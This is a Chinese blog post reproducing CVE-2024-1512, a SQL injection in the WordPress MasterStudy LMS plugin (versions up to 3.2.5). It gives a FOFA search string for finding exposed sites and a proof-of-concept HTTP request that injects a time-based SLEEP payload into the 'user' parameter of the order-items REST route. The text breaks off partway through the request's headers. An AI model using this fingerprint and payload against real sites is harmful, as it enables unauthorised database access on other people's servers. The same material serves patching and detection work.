当前位置:   article > 正文

WordPress MasterStudy LMS插件 SQL注入漏洞复现(CVE-2024-1512)_cve2024复现

cve2024复现

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

0x02 漏洞概述

WordPress Plugin MasterStudy LMS 3.2.5 版本及之前版本存在安全漏洞,该漏洞源于对用户提供的参数转义不足,导致可以通过 /lms/stm-lms/order/items REST 路由的 user 参数进行基于联合的 SQL 注入。

0x03 影响范围

WordPress Plugin MasterStudy LMS <= 3.2.5

0x04 复现环境

FOFA:

body="wp-content/plugins/masterstudy-lms-learning-management-system/"

0x05 漏洞复现

PoC

  1. GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
  2. Host: your-ip
  3. User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20
声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号